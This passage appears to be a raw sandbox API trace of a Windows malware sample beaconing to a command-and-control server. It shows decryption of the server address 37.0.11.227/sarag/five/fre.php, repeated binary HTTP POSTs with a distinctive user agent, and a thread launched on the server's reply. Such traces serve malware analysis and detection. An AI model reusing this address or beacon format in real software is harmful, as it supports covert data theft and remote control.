(lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.991] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0343.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.995] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0343.995] GetProcessHeap () returned 0x690000 [0343.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0343.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.997] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0343.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0343.998] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0343.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.000] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0344.000] GetProcessHeap () returned 0x690000 [0344.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.001] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0344.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.002] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0344.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.003] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0344.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.004] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0344.004] GetProcessHeap () returned 0x690000 [0344.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0344.005] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0344.005] GetProcessHeap () returned 0x690000 [0344.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0344.005] socket (af=2, type=1, protocol=6) returned 0xc70 [0344.006] connect (s=0xc70, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0344.029] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0344.029] GetProcessHeap () returned 0x690000 [0344.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0344.029] GetProcessHeap () returned 0x690000 [0344.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0344.032] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.033] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0344.033] GetProcessHeap () returned 0x690000 [0344.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0344.034] GetProcessHeap () returned 0x690000 [0344.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.034] GetProcessHeap () returned 0x690000 [0344.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0344.034] GetProcessHeap () returned 0x690000 [0344.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0344.035] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.036] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0344.036] GetProcessHeap () returned 0x690000 [0344.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0344.036] GetProcessHeap () returned 0x690000 [0344.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.037] send (s=0xc70, buf=0x6ad508*, len=242, flags=0) returned 242 [0344.037] send (s=0xc70, buf=0x6aba40*, len=159, flags=0) returned 159 [0344.037] GetProcessHeap () returned 0x690000 [0344.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0344.037] recv (in: s=0xc70, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0344.114] GetProcessHeap () returned 0x690000 [0344.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0344.118] GetProcessHeap () returned 0x690000 [0344.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0344.123] GetProcessHeap () returned 0x690000 [0344.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0344.124] GetProcessHeap () returned 0x690000 [0344.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0344.124] closesocket (s=0xc70) returned 0 [0344.125] GetProcessHeap () returned 0x690000 [0344.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0344.125] GetProcessHeap () returned 0x690000 [0344.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.127] GetProcessHeap () returned 0x690000 [0344.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0344.127] GetProcessHeap () returned 0x690000 [0344.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0344.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19c0) returned 0xc70 [0344.134] Sleep (dwMilliseconds=0xea60) [0344.135] GetProcessHeap () returned 0x690000 [0344.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0344.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.137] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.148] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0344.157] GetProcessHeap () returned 0x690000 [0344.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0344.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.158] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.160] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.161] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.161] GetProcessHeap () returned 0x690000 [0344.162] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0344.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.163] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0344.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.177] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.179] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0344.179] GetProcessHeap () returned 0x690000 [0344.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.181] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0344.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.182] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0344.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.183] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0344.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.188] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0344.188] GetProcessHeap () returned 0x690000 [0344.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0344.188] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0344.189] GetProcessHeap () returned 0x690000 [0344.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0344.189] GetProcessHeap () returned 0x690000 [0344.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.189] GetProcessHeap () returned 0x690000 [0344.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0344.189] GetProcessHeap () returned 0x690000 [0344.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0344.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.191] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.196] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0344.203] GetProcessHeap () returned 0x690000 [0344.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0344.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.204] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.205] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.209] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.209] GetProcessHeap () returned 0x690000 [0344.210] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0344.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.212] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0344.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.214] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.215] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0344.215] GetProcessHeap () returned 0x690000 [0344.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.217] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0344.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.220] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0344.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.222] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0344.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.223] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0344.223] GetProcessHeap () returned 0x690000 [0344.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0344.223] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0344.223] GetProcessHeap () returned 0x690000 [0344.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0344.223] socket (af=2, type=1, protocol=6) returned 0xc74 [0344.223] connect (s=0xc74, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0344.248] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0344.248] GetProcessHeap () returned 0x690000 [0344.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0344.248] GetProcessHeap () returned 0x690000 [0344.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0344.250] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.253] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0344.253] GetProcessHeap () returned 0x690000 [0344.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0344.254] GetProcessHeap () returned 0x690000 [0344.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.254] GetProcessHeap () returned 0x690000 [0344.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0344.254] GetProcessHeap () returned 0x690000 [0344.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0344.255] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.256] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0344.256] GetProcessHeap () returned 0x690000 [0344.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0344.256] GetProcessHeap () returned 0x690000 [0344.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.257] send (s=0xc74, buf=0x6ad508*, len=242, flags=0) returned 242 [0344.258] send (s=0xc74, buf=0x6aba40*, len=159, flags=0) returned 159 [0344.258] GetProcessHeap () returned 0x690000 [0344.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0344.258] recv (in: s=0xc74, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0344.333] GetProcessHeap () returned 0x690000 [0344.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0344.333] GetProcessHeap () returned 0x690000 [0344.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0344.334] GetProcessHeap () returned 0x690000 [0344.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0344.334] GetProcessHeap () returned 0x690000 [0344.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0344.335] closesocket (s=0xc74) returned 0 [0344.336] GetProcessHeap () returned 0x690000 [0344.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0344.336] GetProcessHeap () returned 0x690000 [0344.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.336] GetProcessHeap () returned 0x690000 [0344.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0344.337] GetProcessHeap () returned 0x690000 [0344.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0344.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19c4) returned 0xc74 [0344.342] Sleep (dwMilliseconds=0xea60) [0344.344] GetProcessHeap () returned 0x690000 [0344.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0344.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0344.359] GetProcessHeap () returned 0x690000 [0344.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0344.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.363] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0344.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.364] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.365] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.365] GetProcessHeap () returned 0x690000 [0344.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0344.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.366] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0344.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.367] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0344.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.368] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0344.368] GetProcessHeap () returned 0x690000 [0344.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.369] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0344.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.370] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0344.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.380] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0344.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.381] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0344.381] GetProcessHeap () returned 0x690000 [0344.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0344.381] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0344.382] GetProcessHeap () returned 0x690000 [0344.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0344.382] GetProcessHeap () returned 0x690000 [0344.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.385] GetProcessHeap () returned 0x690000 [0344.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0344.386] GetProcessHeap () returned 0x690000 [0344.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0344.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.393] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0344.400] GetProcessHeap () returned 0x690000 [0344.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0344.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.402] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.403] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.404] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.404] GetProcessHeap () returned 0x690000 [0344.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0344.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.407] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0344.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.409] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.410] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0344.410] GetProcessHeap () returned 0x690000 [0344.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 